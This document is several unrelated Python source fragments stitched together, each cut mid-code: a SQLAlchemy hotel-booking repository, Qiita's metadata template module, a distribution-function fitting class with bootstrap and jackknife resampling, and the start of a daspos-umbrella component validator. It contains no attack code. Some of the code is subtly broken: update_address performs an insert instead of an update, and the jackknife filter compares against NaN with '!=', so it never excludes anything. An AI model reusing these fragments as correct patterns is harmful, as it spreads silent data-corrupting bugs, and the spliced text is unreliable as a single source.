return {"id": hotel_id, **hotel.dict()}
def delete_hotel(self, hotel_id):
""" Delete hotel by its id. """
hotel_table = self.setup_hotels_table()
# TODO : Check if the cascade deletion is up or not ?
query = delete(hotel_table).where(hotel_table.c.id == hotel_id)
return self.engine.connect().execute(query)
def get_all_addresses(self):
""" Get all addresses. """
address_tables = self.setup_addresses_table()
query = select(
address_tables.c.id,
address_tables.c.hotel_id,
address_tables.c.number,
address_tables.c.street,
address_tables.c.postal_code,
address_tables.c.town,
)
return self.engine.connect().execute(query).all()
def get_address_by_hotel_id(self, hotel_id):
""" Return hotel's address, find by hotel's id ."""
address_table = self.setup_addresses_table()
query = select(
address_table.c.id,
address_table.c.hotel_id,
address_table.c.number,
address_table.c.street,
address_table.c.town,
address_table.c.postal_code,
).where(address_table.c.hotel_id == hotel_id)
result = self.engine.connect().execute(query).all()
return result
def get_address_by_id(self, address_id):
""" Return address by its id ."""
address_table = self.setup_addresses_table()
query = select(
address_table.c.id,
address_table.c.hotel_id,
address_table.c.number,
address_table.c.street,
address_table.c.town,
address_table.c.postal_code,
).where(address_table.c.id == address_id)
result = self.engine.connect().execute(query).fetchone()
return result
def create_address(self, address, hotel_id):
""" Create address. """
address_table = self.setup_addresses_table()
query = insert(address_table).values(
hotel_id=hotel_id,
number=address.number,
street=address.street,
town=address.town,
postal_code=address.postal_code,
)
self.engine.connect().execute(query)
last_address_id = (
self.engine.connect()
.execute(
"SELECT LAST_INSERT_ID() as id",
)
.fetchone()
)
return {"id": last_address_id.id, **address.dict()}
def update_address(self, address, address_id):
""" Update an address by its id. """
address_table = self.setup_addresses_table()
query = insert(address_table).values(
hotel_id=address.hotel_id,
number=address.number,
street=address.street,
town=address.town,
postal_code=address.postal_code,
)
self.engine.connect().execute(query)
return {"id": address_id, **address.dict()}
def delete_address(self, address_id):
""" Delete an address by its id. """
address_table = self.setup_addresses_table()
query = delete(address_table).where(address_table.c.id == address_id)
return self.engine.connect().execute(query)
def get_all_rooms(
self,
hotel_id: int = 0,
capacity: int = 0,
) -> sqlalchemy.engine.cursor.LegacyCursorResult:
"""List all rooms in database."""
rooms_table = self.setup_rooms_table()
query = select(
rooms_table.c.id,
rooms_table.c.hotel_id,
rooms_table.c.room,
rooms_table.c.price,
rooms_table.c.capacity,
)
if hotel_id > 0:
query = query.where(rooms_table.c.hotel_id == hotel_id)
if capacity > 0:
query = query.where(rooms_table.c.capacity == capacity)
rooms_result = self.engine.connect().execute(query).all()
return rooms_result
def get_room_by_id(
self,
room_id: int = 1,
) -> sqlalchemy.engine.cursor.LegacyCursorResult:
"""Get room by ID."""
table = self.setup_rooms_table()
query = select(
table.c.id,
table.c.hotel_id,
table.c.room,
table.c.price,
table.c.capacity,
).where(table.c.id == room_id)
return self.engine.connect().execute(query).fetchone()
def create_room(self, room):
""" Create a room. """
room_table = self.setup_rooms_table()
query = insert(room_table).values(
hotel_id=room.hotel_id,
room=room.room,
capacity=room.capacity,
price=room.price,
)
self.engine.connect().execute(query)
last_row = (
self.engine.connect()
.execute(
"SELECT LAST_INSERT_ID() as id",
)
.fetchone()
)
return {"id": last_row.id, **room.dict()}
def update_room(self, room, room_id):
""" Update a room by its id. """
room_table = self.setup_rooms_table()
query = (
update(room_table)
.where(room_table.c.id == room_id)
.values(
hotel_id=room.hotel_id,
room=room.room,
capacity=room.capacity,
price=room.price,
)
)
self.engine.connect().execute(query)
return {"id": room_id, **room.dict()}
def delete_room(self, room_id):
""" Delete a room by its id. """
room_table = self.setup_rooms_table()
query = delete(room_table).where(room_table.c.id == room_id)
return self.engine.connect().execute(query)
def get_options(self) -> sqlalchemy.engine.cursor.LegacyCursorResult:
""" Get all options. """
option_table = self.setup_options_table()
query = select(
option_table.c.id,
option_table.c.name,
option_table.c.price,
)
options_result = self.engine.connect().execute(query).all()
return options_result
def get_option_by_id(self, option_id: int = 1):
""" Get option by its id. """
option_table = self.setup_options_table()
query = option_table.select().where(option_table.c.id == option_id)
return self.engine.connect().execute(query).all()
def create_option(self, option):
""" Create a new option. """
option_table = self.setup_options_table()
query = insert(option_table).values(
name=option.name,
price=option.price,
)
self.engine.connect().execute(query)
last_row = (
self.engine.connect()
.execute(
"SELECT LAST_INSERT_ID() as id",
)
.fetchone()
)
return {"id": last_row.id, **option.dict()}
def update_option(self, option, option_id):
""" Update an option. """
option_table = self.setup_options_table()
query = (
update(option_table)
.where(option_table.c.id == option_id)
.values(
name=option.name,
price=option.price,
)
)
self.engine.connect().execute(query)
return {"id": option_id, **option.dict()}
def delete_option(self, option_id):
""" Delete an option. """
option_table = self.setup_options_table()
query = delete(option_table).where(option_table.c.id == option_id)
return self.engine.connect().execute(query)
def get_price_policies(self):
""" Get all price_policies. """
pp_table = self.setup_price_policies_table()
query = select(
pp_table.c.id,
pp_table.c.name,
pp_table.c.room_id,
pp_table.c.room_majoration,
pp_table.c.price_policy_type,
pp_table.c.day_number,
pp_table.c.capacity_limit,
pp_table.c.is_default,
pp_table.c.majoration_start_date,
pp_table.c.majoration_end_date,
)
pp_result = self.engine.connect().execute(query).all()
return pp_result
def get_price_policy_by_id(self, price_policy_id):
""" Get price_policy bi its id. """
pp_table = self.setup_price_policies_table()
query = select(
pp_table.c.id,
pp_table.c.name,
pp_table.c.room_id,
pp_table.c.room_majoration,
pp_table.c.price_policy_type,
pp_table.c.day_number,
pp_table.c.capacity_limit,
pp_table.c.is_default,
pp_table.c.majoration_start_date,
pp_table.c.majoration_end_date,
).where(pp_table.c.id == price_policy_id)
pp_result = self.engine.connect().execute(query).all()
return pp_result
def create_price_policy(self, price_policy):
""" Create a new price_policy. """
pp_table = self.setup_price_policies_table()
# TODO : Add check
# manage_rules_price_policies
query = insert(pp_table).values(
name=price_policy.name,
room_id=price_policy.room_id,
room_majoration=price_policy.room_majoration,
price_policy_type=price_policy.price_policy_type,
day_number=price_policy.day_number,
capacity_limit=price_policy.capacity_limit,
is_default=price_policy.is_default,
majoration_start_date=price_policy.majoration_start_date,
majoration_end_date=price_policy.majoration_end_date,
)
self.engine.connect().execute(query)
last_row = (
self.engine.connect()
.execute(
"SELECT LAST_INSERT_ID() as id",
)
.fetchone()
)
return {"id": last_row.id, **price_policy.dict()}
def update_price_policy(self, price_policy, price_policy_id):
""" Update an option. """
pp_table = self.setup_price_policies_table()
# TODO : Add check
# manage_rules_price_policies
query = (
update(pp_table)
.where(pp_table.c.id == price_policy_id)
.values(
name=price_policy.name,
room_id=price_policy.room_id,
price_policy_type=price_policy.price_policy_type,
room_majoration=price_policy.room_majoration,
day_number=price_policy.day_number,
capacity_limit=price_policy.capacity_limit,
is_default=price_policy.is_default,
majoration_start_date=price_policy.majoration_start_date,
majoration_end_date=price_policy.majoration_end_date,
)
)
self.engine.connect().execute(query)
return {"id": price_policy_id, **price_policy.dict()}
def delete_price_policy(self, price_policy_id):
""" Delete an option. """
pp_table = self.setup_price_policies_table()
query = delete(pp_table).where(pp_table.c.id == price_policy_id)
| |
<filename>qiita_db/metadata_template/base_metadata_template.py
r"""
Metadata template objects (:mod: `qiita_db.metadata_template)
=============================================================
..currentmodule:: qiita_db.metadata_template
This module provides the MetadataTemplate base class and the subclasses
SampleTemplate and PrepTemplate.
Classes
-------
..autosummary::
:toctree: generated/
BaseSample
Sample
PrepSample
MetadataTemplate
SampleTemplate
PrepTemplate
Methods
-------
..autosummary::
:toctree: generated/
"""
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from __future__ import division
from future.utils import viewitems, viewvalues
from future.builtins import zip
from os.path import join
from functools import partial
import pandas as pd
import numpy as np
from skbio.util import find_duplicates
import warnings
from qiita_core.exceptions import IncompetentQiitaDeveloperError
from qiita_db.exceptions import (QiitaDBUnknownIDError, QiitaDBColumnError,
QiitaDBNotImplementedError, QiitaDBError,
QiitaDBWarning, QiitaDBDuplicateHeaderError,
QiitaDBDuplicateSamplesError)
from qiita_db.base import QiitaObject
from qiita_db.sql_connection import TRN
from qiita_db.util import (exists_table, get_table_cols,
get_mountpoint, insert_filepaths)
from qiita_db.logger import LogEntry
from .util import (as_python_types, get_datatypes, get_invalid_sample_names,
prefix_sample_names_with_id, type_lookup, cast_to_python)
class BaseSample(QiitaObject):
r"""Sample object that accesses the db to get the information of a sample
belonging to a PrepTemplate or a SampleTemplate.
Parameters
----------
sample_id : str
The sample id
md_template : MetadataTemplate
The metadata template obj to which the sample belongs to
Methods
-------
__eq__
__len__
__getitem__
__setitem__
__delitem__
__iter__
__contains__
exists
keys
values
items
get
See Also
--------
QiitaObject
Sample
PrepSample
"""
# Used to find the right SQL tables - should be defined on the subclasses
_table_prefix = None
_column_table = None
_id_column = None
def _check_template_class(self, md_template):
r"""Checks that md_template is of the correct type
Parameters
----------
md_template : MetadataTemplate
The metadata template
Raises
------
IncompetentQiitaDeveloperError
If its call directly from the Base class
If `md_template` doesn't have the correct type
"""
raise IncompetentQiitaDeveloperError()
def __init__(self, sample_id, md_template):
r"""Initializes the object
Parameters
----------
sample_id : str
The sample id
md_template : MetadataTemplate
The metadata template in which the sample is present
Raises
------
QiitaDBUnknownIDError
If `sample_id` does not correspond to any sample in md_template
"""
# Check that we are not instantiating the base class
self._check_subclass()
# Check that the md_template is of the correct type
self._check_template_class(md_template)
# Check if the sample id is present on the passed metadata template
# This test will check that the sample id is actually present on the db
if sample_id not in md_template:
raise QiitaDBUnknownIDError(sample_id, self.__class__.__name__)
# Assign private attributes
self._id = sample_id
self._md_template = md_template
self._dynamic_table = "%s%d" % (self._table_prefix,
self._md_template.id)
def __hash__(self):
r"""Defines the hash function so samples are hashable"""
return hash(self._id)
def __eq__(self, other):
r"""Self and other are equal based on type and ids"""
if not isinstance(other, type(self)):
return False
if other._id != self._id:
return False
if other._md_template != self._md_template:
return False
return True
@classmethod
def exists(cls, sample_id, md_template):
r"""Checks if already exists a MetadataTemplate for the provided object
Parameters
----------
sample_id : str
The sample id
md_template : MetadataTemplate
The metadata template to which the sample belongs to
Returns
-------
bool
True if already exists. False otherwise.
"""
with TRN:
cls._check_subclass()
sql = """SELECT EXISTS(
SELECT * FROM qiita.{0}
WHERE sample_id=%s AND {1}=%s
)""".format(cls._table, cls._id_column)
TRN.add(sql, [sample_id, md_template.id])
return TRN.execute_fetchlast()
def _get_categories(self):
r"""Returns all the available metadata categories for the sample
Returns
-------
set of str
The set of all available metadata categories
"""
# Get all the columns
cols = get_table_cols(self._dynamic_table)
# Remove the sample_id column as this column is used internally for
# data storage and it doesn't actually belong to the metadata
cols.remove('sample_id')
return set(cols)
def _to_dict(self):
r"""Returns the categories and their values in a dictionary
Returns
-------
dict of {str: str}
A dictionary of the form {category: value}
"""
with TRN:
sql = "SELECT * FROM qiita.{0} WHERE sample_id=%s".format(
self._dynamic_table)
TRN.add(sql, [self._id])
d = dict(TRN.execute_fetchindex()[0])
# Remove the sample_id, is not part of the metadata
del d['sample_id']
return d
def __len__(self):
r"""Returns the number of metadata categories
Returns
-------
int
The number of metadata categories
"""
# return the number of columns
return len(self._get_categories())
def __getitem__(self, key):
r"""Returns the value of the metadata category `key`
Parameters
----------
key : str
The metadata category
Returns
-------
obj
The value of the metadata category `key`
Raises
------
KeyError
If the metadata category `key` does not exists
See Also
--------
get
"""
with TRN:
key = key.lower()
if key not in self._get_categories():
# The key is not available for the sample, so raise a KeyError
raise KeyError(
"Metadata category %s does not exists for sample %s"
" in template %d" % (key, self._id, self._md_template.id))
sql = """SELECT {0} FROM qiita.{1}
WHERE sample_id=%s""".format(key, self._dynamic_table)
TRN.add(sql, [self._id])
return TRN.execute_fetchlast()
def setitem(self, column, value):
"""Sets `value` as value for the given `column`
Parameters
----------
column : str
The column to update
value : str
The value to set. This is expected to be a str on the assumption
that psycopg2 will cast as necessary when updating.
Raises
------
QiitaDBColumnError
If the column does not exist in the table
"""
with TRN:
# Check if the column exist in the table
if column not in self._get_categories():
raise QiitaDBColumnError("Column %s does not exist in %s" %
(column, self._dynamic_table))
sql = """UPDATE qiita.{0}
SET {1}=%s
WHERE sample_id=%s""".format(self._dynamic_table, column)
TRN.add(sql, [value, self._id])
def __setitem__(self, column, value):
r"""Sets the metadata value for the category `column`
Parameters
----------
column : str
The column to update
value : str
The value to set. This is expected to be a str on the assumption
that psycopg2 will cast as necessary when updating.
Raises
------
ValueError
If the value type does not match the one in the DB
"""
with TRN:
self.setitem(column, value)
try:
TRN.execute()
except ValueError as e:
# catching error so we can check if the error is due to
# different column type or something else
value_type = type_lookup(type(value))
sql = """SELECT udt_name
FROM information_schema.columns
WHERE column_name = %s
AND table_schema = 'qiita'
AND (table_name = %s OR table_name = %s)"""
TRN.add(sql, [column, self._table, self._dynamic_table])
column_type = TRN.execute_fetchlast()
if column_type != value_type:
raise ValueError(
'The new value being added to column: "{0}" is "{1}" '
'(type: "{2}"). However, this column in the DB is of '
'type "{3}". Please change the value in your updated '
'template or reprocess your template.'.format(
column, value, value_type, column_type))
raise e
def __delitem__(self, key):
r"""Removes the sample with sample id `key` from the database
Parameters
----------
key : str
The sample id
"""
raise QiitaDBNotImplementedError()
def __iter__(self):
r"""Iterator over the metadata keys
Returns
-------
Iterator
Iterator over the sample ids
See Also
--------
keys
"""
return iter(self._get_categories())
def __contains__(self, key):
r"""Checks if the metadata category `key` is present
Parameters
----------
key : str
The sample id
Returns
-------
bool
True if the metadata category `key` is present, false otherwise
"""
return key.lower() in self._get_categories()
def keys(self):
r"""Iterator over the metadata categories
Returns
-------
Iterator
Iterator over the sample ids
See Also
--------
__iter__
"""
return self.__iter__()
def values(self):
r"""Iterator over the metadata values, in metadata category order
Returns
-------
Iterator
Iterator over metadata values
"""
d = self._to_dict()
return d.values()
def items(self):
r"""Iterator over (category, value) tuples
Returns
-------
Iterator
Iterator over (category, value) tuples
"""
d = self._to_dict()
return d.items()
def get(self, key):
r"""Returns the metadata value for category `key`, or None if the
category `key` is not present
Parameters
----------
key : str
The metadata category
Returns
-------
Obj or None
The value object for the category `key`, or None if it is not
present
See Also
--------
__getitem__
"""
try:
return self[key]
except KeyError:
return None
class MetadataTemplate(QiitaObject):
r"""Metadata map object that accesses the db to get the sample/prep
template information
Attributes
----------
id
Methods
-------
exists
__len__
__getitem__
__setitem__
__delitem__
__iter__
__contains__
keys
values
items
get
to_file
add_filepath
update
See Also
--------
QiitaObject
SampleTemplate
PrepTemplate
"""
# Used to find the right SQL tables - should be defined on the subclasses
_table_prefix = None
_column_table = None
_id_column = None
_sample_cls = None
def _check_id(self, id_):
r"""Checks that the MetadataTemplate id_ exists on the database"""
with TRN:
sql = "SELECT EXISTS(SELECT * FROM qiita.{0} WHERE {1}=%s)".format(
self._table, | |
evaluate likelihood at initial parameters provided"
)
except Exception as e:
raise e
# maximize ln(L) (NOTE: this is set up to match the R version)
opt_options = {"maxiter": 100000}
if self.ignore_uncertainties:
# Coarse binning when x_err is None requires different solver that
# doesn't use jacobian.
method = "Nelder-Mead"
else:
method = "BFGS"
opt = minimize(neglogL, p0, method=method, options=opt_options)
offset += opt.fun
chain[k] = np.concatenate((opt.x, [opt.fun]))
# assess convergence
if (
self.ignore_uncertainties and not self.correct_lss_bias
) or self.keep_eddington_bias:
converged = opt.success
running = False
else:
value_old = 1.0 * opt.fun
# asses convergence
if k == 0:
converged = False
d_old = np.inf
else:
d = np.abs(opt.fun - value_old)
converged = d >= d_old
d_old = d * 1
if converged:
running = False
elif k == self.n_iterations - 1:
converged = False
running = False
print(
"WARNING: Maximum number of iteration reached. Consider increasing "
"n.iterations and/or providing better initial parameters."
)
# prepare initial values for next iteration
p0 = opt.x
k += 1
# make output
cov = self.covariance(opt.x)
if np.linalg.det(cov) > 1e12:
converged = False
cov = None
print(
"WARNING: Fit ill-conditioned. Consider providing better initial parameters or selection arguments."
)
ln_evidence = False
else:
n_para = len(opt.x)
ln_evidence = (
-offset
+ 0.5 * n_para * np.log(2 * np.pi)
+ 0.5 * np.log(np.linalg.det(cov))
)
if self.correct_lss_bias:
self.selection._get_veff_lss(
self.data.r,
self.grid,
opt.x,
self.model,
weight=self.lss_weight
if self.lss_weight is not None
else lambda x: np.ones_like(x),
)
fit = Fit(
p_best=opt.x,
p_covariance=cov,
lnL=lambda p: -neglogL(p),
opt=opt,
status=dict(n_iterations=k, converged=converged, chain=chain[:k]),
ln_evidence=ln_evidence,
gdf_=self.model.gdf,
veff_=self.selection.Veff,
)
# UPDATE GRID
self.grid.gdf = self.model.gdf(*self.grid.x, p=opt.x)
self.grid.veff = self.selection.Veff(*self.grid.x)
self.grid.scd = self.grid.gdf * self.grid.veff
# finalize output
return fit
@cached_property
def _gaussian_errors(self):
cov = self.fit.p_covariance
# sample surface of covariance ellipsoid
nsteps = 500
p_new = sample_ellipsoid(cov, nsteps, add_boundaries=True, mean=self.fit.p_best)
y_new = np.zeros((self.grid.n_points, len(p_new)))
for i, p in enumerate(p_new):
y_new[:, i] = self.model.gdf(*self.grid.x, p=p)
self.grid.gdf_gaussian_min = np.nanmin(y_new, axis=1)
self.grid.gdf_gaussian_max = np.nanmax(y_new, axis=1)
return self.grid.gdf_gaussian_min, self.grid.gdf_gaussian_max
@cached_property
def gdf_gaussian_min(self):
"""The minimum value of the generative distribution function at each gridded x,
for any combination of parameters within 1-sigma of the best fit."""
return self._gaussian_errors[0]
@cached_property
def gdf_gaussian_max(self):
"""The maximum value of the generative distribution function at each gridded x,
for any combination of parameters within 1-sigma of the best fit."""
return self._gaussian_errors[1]
def _refit_to_new_sample(self, n, do_jackknife=False, lss_errors=True):
if not self.fit.status["converged"]:
print(
"The fit did not converge, and therefore resampling cannot be performed."
)
# input handling
n_data = self.data.n_data
npar = self.model.n_param
if do_jackknife:
n = min(n, n_data)
if n_data < 3:
raise ValueError("Resampling/Jackknifing requires at least three objects.")
if n < 2:
raise ValueError("Resampling/Jackknifing requires at least 2 iterations")
# set up resample survey
# Copy current object into new one, sharing most things.
# randomly resample and refit the DF
p_new = np.empty((n, npar))
if do_jackknife:
reject = np.random.choice(n_data, size=n, replace=False)
for iteration in range(n):
# print('Resampling: %4.2f'%(float(iteration) / n))
if not do_jackknife:
n_data = max(2, np.random.poisson(self.data.n_data))
s = np.random.randint(0, self.data.n_data - 1, size=n_data)
else:
s = np.arange(n_data) != reject[iteration]
x = self.data.x[s]
if self.data.x_err is not None:
x_err = self.data.x_err[s]
else:
x_err = None
if self.data.r is not None:
r = self.data.r[s]
else:
r = None
b = DFFit(
data=Data(x=x.flatten(), x_err=np.squeeze(x_err), r=r),
selection=self.selection,
grid_dx=self.grid_dx,
model=self.model,
n_iterations=self.n_iterations,
keep_eddington_bias=self.keep_eddington_bias,
correct_lss_bias=self.correct_lss_bias and lss_errors,
lss_weight=self.lss_weight,
)
b.model.p0 = self.fit.p_best
p_new[iteration] = b.fit.p_best
return p_new
def resample(self, n_bootstrap=30, lss_errors=True):
"""
Performs a bootstrapping of the sample to provide a better covariance estimate.
The data is resampled ``n_bootstrap`` times using a non-parametric
bootstrapping method to produce more accurate covariances.
Parameters
----------
n_bootstrap: int,optional
Number of bootstrapping iterations.
lss_errors : bool, optional
A logical flag specifying whether uncertainties computed via resampling should include errors due to the
uncertainty of large-scale structure (LSS). If ``True` the parameter uncertainties are estimated by refitting
the LSS correction at each resampling iteration. This argument is only considered if ``correct_lss_bias=True``
and ``n_bootstrap>0``.
Notes
-----
This routine does not return anything, but rather adds properties to the object. Importantly, it adds
:attr:`~.fit.p_covariance_resample` along with :attr:`~.fit.p_quantile` and :attr:`~.grid.gdf_quantile`.
"""
p_new = self._refit_to_new_sample(n_bootstrap, lss_errors=lss_errors)
# compute covariance
self.fit.p_covariance_resample = np.cov(p_new.T)
# make parameter quantiles
q = [2.0, 16, 84.0, 98.0]
self.fit.p_quantile = np.percentile(p_new, q, axis=0)
# make DF quantiles
s = np.empty((n_bootstrap, self.grid.n_points))
for i in range(n_bootstrap):
s[i] = self.model.gdf(*self.grid.x, p=p_new[i])
y_quant = np.empty((4, self.grid.n_points))
for i in range(self.grid.n_points):
lst = np.logical_and(
np.logical_not(np.logical_and(np.isnan(s[:, i]), np.isfinite(s[:, i]))),
s[:, i] > 0,
)
y_quant[:, i] = np.percentile(s[lst, i], q)
self.grid.gdf_quantile = y_quant
def jackknife(self, n_jackknife=30, lss_errors=True):
"""
Perform a jack-knife resampling to account for bias in the estimator.
The data is jackknife-resampled ``n_jackknife`` times,
removing exactly one data point from the observed set at each iteration. This resampling adds model parameters,
maximum likelihood estimator (MLE) bias corrected parameter estimates (corrected to order 1/N).
Parameters
----------
n_jackknife : int
The number of re-samplings to perform. If ``n_jackknife`` is larger than the number of data points N,
it is automatically reduced to N.
lss_errors : bool, optional
A logical flag specifying whether uncertainties computed via resampling should include errors due to the
uncertainty of large-scale structure (LSS). If ``True` the parameter uncertainties are estimated by refitting
the LSS correction at each resampling iteration. This argument is only considered if ``correct_lss_bias=True``
and ``n_bootstrap>0``.
Notes
-----
This routine does not return anything, but rather adds properties to the object. Importantly, it adds
:attr:`~.fit.p_covariance_jackknife`.
"""
p_new = self._refit_to_new_sample(
n_jackknife, do_jackknife=True, lss_errors=lss_errors
)
# estimate covariance
n_data = self.data.n_data
npar = self.model.n_param
ok = np.sum(p_new, axis=1) != np.nan
cov_jn = np.cov(p_new[ok]) * (n_data - 1)
# compute poisson covariance
jn = DFFit(
data=self.data,
selection=self.selection,
grid_dx=self.grid_dx,
model=self.model,
n_iterations=self.n_iterations,
keep_eddington_bias=self.keep_eddington_bias,
correct_lss_bias=self.correct_lss_bias and lss_errors,
lss_weight=self.lss_weight,
)
jn.model.p0 = self.fit.p_best
jn.options.n_iterations = 1
q = [0.16, 0.5, 0.84]
p_pois = np.empty((3, npar))
for i in range(3):
n_new = poisson.ppf(q[i], n_data)
jn.grid.veff = self.grid.veff * n_new / n_data
p_pois[i] = jn.fit.p_best
cov_pois = np.cov(p_pois)
# estimate combined covariance
if np.isnan(cov_pois[0, 0]):
self.fit.p_covariance_jackknife = cov_jn
else:
self.fit.p_covariance_jackknife = cov_jn + cov_pois
# correct estimator bias
p_reduced = np.nanmean(p_new, axis=1)
self.fit.p_best_mle_bias_corrected = (
n_data * self.fit.p_best - (n_data - 1) * p_reduced
)
self.fit.gdf_mle_bias_corrected = lambda x: self.model.gdf(
x, self.fit.p_best_mle_bias_corrected
)
self.fit.scd_mle_bias_corrected = lambda x: self.fit.gdf_mle_bias_corrected(
x
) * self.selection.Veff(x)
self.grid.gdf_mle_bias_corrected = self.fit.gdf_mle_bias_corrected(self.grid.x)
self.grid.scd_mle_bias_corrected = self.fit.scd_mle_bias_corrected(self.grid.x)
@cached_property
def posterior(self):
"""
A :class:`~Posteriors` object representing posterior density of each observed object.
Notes
-----
Creation of this object also adds some quantities to the :attr:`grid` attribute, notably
`scd_posterior` and `effective_counts`.
"""
if self.ignore_uncertainties:
return None
# Input handling
x = self.data.x
x_mesh = self.grid.x
x_mesh_dv = self.grid.dvolume
n_data = x.shape[0]
n_dim = x.shape[1]
# produce posteriors
m0 = np.empty((n_data, n_dim))
m1 = np.empty((n_data, n_dim))
# make posterior PDF for data point i
rho_corrected = self.rho_corrected(self.fit.p_best)
s = np.sum(rho_corrected, axis=1) # shape ndata
rho_unbiased = self.rho_unbiased(self.fit.p_best)
rho_unbiased_sqr = np.sum((rho_corrected.T / (s * x_mesh_dv)) ** 2, axis=1)
# mean, standard deviation and mode
for j in range(n_dim):
m0[:, j] = np.sum(x_mesh[j] * rho_corrected, axis=1) / s
m1[:, j] = np.sqrt(
np.sum(np.add.outer(-m0[:, j], x_mesh[j]) ** 2 * rho_corrected, axis=1)
/ s
)
a = np.argmax(rho_corrected, axis=1)
md = np.array([xj[a] for xj in x_mesh]).T
posterior = Posteriors(
x_mean=m0,
x_stdev=m1,
x_mode=md,
x_random=m0 + m1 * np.random.normal(size=(n_data, n_dim)),
)
self.grid.scd_posterior = rho_unbiased
self.grid.effective_counts = (
rho_unbiased ** 2 / rho_unbiased_sqr
) # this equation gives the effective number of sources per bin
self.grid.effective_counts[np.isinf(self.grid.effective_counts)] = 0
return posterior
def fit_summary(self, format_for_notebook=False):
"""
Return a string summary of the fit.
Parameters
----------
format_for_notebook : bool, optional
Whether the string should be formatted for printing in a Jupyter
notebook.
Returns
-------
fit_summary : str
A string summary of the fit.
"""
p = self.fit.p_best
string = ""
br = "<br>" if format_for_notebook else "\n"
if self.model.gdf_equation is not None:
string += "%s%s" % (self.model.gdf_equation, br * 2)
# if format_for_notebook:
# string += "\n```\n"
| |
<reponame>crcresearch/daspos-umbrella<gh_stars>1-10
# This file is part of the daspos-umbrella package.
#
# For copyright and licensing information about this package, see the
# NOTICE.txt and LICENSE.txt files in its top-level directory; they are
# available at https://github.com/crcresearch/daspos-umbrella
#
# Licensed under the MIT License (MIT);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://opensource.org/licenses/MIT
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import urllib2
from umbrella.umbrella_errors import MissingComponentError, ComponentTypeError, ProgrammingError, UmbrellaError, \
REQUIRED_ATTRIBUTE_MISSING_ERROR_CODE, WRONG_ATTRIBUTE_TYPE_ERROR_CODE, WRONG_FILE_SIZE_ERROR_CODE, \
WRONG_MD5_ERROR_CODE, BAD_URL_ERROR_CODE
from umbrella.misc import get_md5_and_file_size
COMPONENT_NAME = "component_name"
TYPE = "type"
NEST = "nest"
END_NEST = "end_nest"
# Components
SPECIFICATION_NAME = "comment"
SPECIFICATION_DESCRIPTION = "note"
HARDWARE = "hardware"
KERNEL = "kernel"
OS = "os"
PACKAGE_MANAGER = "package_manager"
SOFTWARE = "software"
DATA_FILES = "data"
ENVIRONMENT_VARIABLES = "environ"
COMMANDS = "cmd"
OUTPUT = "output"
# Component keys
ARCHITECTURE = "arch"
CORES = "cores"
MEMORY = "memory"
DISK_SPACE = "disk"
NAME = "name"
VERSION = "version"
PACKAGES = "list"
REPOSITORIES = "config"
FILES = "files"
DIRECTORIES = "dirs"
ID = "id"
FILE_NAME = "name"
URL_SOURCES = "source"
MOUNT_POINT = "mountpoint"
MD5 = "checksum"
FILE_SIZE = "size"
FILE_FORMAT = "format"
UNCOMPRESSED_FILE_SIZE = "uncompressed_size"
SPECIFICATION_ROOT_COMPONENT_NAMES = [
SPECIFICATION_NAME, SPECIFICATION_DESCRIPTION, HARDWARE, KERNEL, OS, PACKAGE_MANAGER, SOFTWARE, DATA_FILES,
ENVIRONMENT_VARIABLES, COMMANDS, OUTPUT,
]
class Component(object):
_type = (str, unicode)
_required_keys = {}
is_required = False
def __init__(self, component_name, component_json=None):
self.name = component_name
self.component_json = component_json
@property
def required_keys(self):
return self._required_keys
def validate(self, error_log, callback_function=None, *args):
is_valid = True
if not isinstance(self.component_json, self._type):
if isinstance(self._type, tuple):
the_type = "string"
else:
the_type = self._type.__name__
raise ComponentTypeError(
"Component \"" + str(self.name) + "\" is of type \"" + str(self.component_json.__class__.__name__) +
"\" but must be of type \"" + str(the_type) + '"',
component_name=self.name,
attempted_type=type(self.component_json),
correct_type=self._type
)
if isinstance(self.component_json, dict): # Keys only apply to components that are dictionaries
for key, info in self._required_keys.iteritems():
if key not in self.component_json: # Required key is missing
is_valid = False
umbrella_error = UmbrellaError(
error_code=REQUIRED_ATTRIBUTE_MISSING_ERROR_CODE,
description="Attribute \"" + str(key) + "\" is required",
may_be_temporary=False,
component_name=self.name
)
error_log.append(umbrella_error)
# error_log.append("\"%s\" key is required in %s component" % (key, self.name))
else: # Required key is there, now check if it is set up right
if not self.validate_subcomponent(error_log, self.component_json[key], info, key): # Call this recursive function and check all pieces
is_valid = False
elif len(self._required_keys) > 0:
raise ProgrammingError("Check component \"" + str(self.name) + "\" and its _required_keys")
return is_valid
def validate_subcomponent(self, error_log, subcomponent_json, info, key_name):
is_valid = True
if subcomponent_json is None:
raise ProgrammingError("subcomponent_json should not be None")
if info is None:
raise ProgrammingError("info should not be None")
if key_name is None:
raise ProgrammingError("key_name should not be None")
if info == END_NEST: # This is used for things that do not need to look deeper (ie config for package_manager)
return True
if not isinstance(subcomponent_json, info[TYPE]): # Check if it is the right type
is_valid = False
if isinstance(info[TYPE], tuple):
the_type = "string"
else:
the_type = info[TYPE].__name__
umbrella_error = UmbrellaError(
error_code=WRONG_ATTRIBUTE_TYPE_ERROR_CODE,
description="Attribute \"" + str(key_name) + "\" is of type \"" + str(subcomponent_json.__class__.__name__) +
"\" but should be of type \"" + str(the_type) + '"',
may_be_temporary=False, component_name=self.name
)
error_log.append(umbrella_error)
# error_log.append(
# '"' + str(key_name) + "\" key or one of its children, in component \"" + str(self.name) +
# "\" is of type \"" + str(type(subcomponent_json)) + "\" but should be of type \"" +
# str(info[TYPE]) + '"')
# Dictionaries will have key_names, but lists won't. If it is a list, we will just use last dictionary's key_name
if isinstance(subcomponent_json, dict):
for key in subcomponent_json:
subkey_name = key
if not self.validate_subcomponent(error_log, subcomponent_json[key], info[NEST], subkey_name):
is_valid = False
if isinstance(subcomponent_json, list):
for key in subcomponent_json:
subkey_name = key_name
if not self.validate_subcomponent(error_log, key, info[NEST], subkey_name):
is_valid = False
return is_valid
def set_type(self, new_type):
if isinstance(new_type, type):
self._type = new_type
else:
raise TypeError("New type must be of type \"type\". Confusing huh? :)")
@staticmethod
def get_specific_component(component_name, component_json):
if not isinstance(component_name, (str, unicode)):
raise TypeError("component_name must be a string.")
if component_name == SPECIFICATION_NAME:
return NameComponent(component_name, component_json)
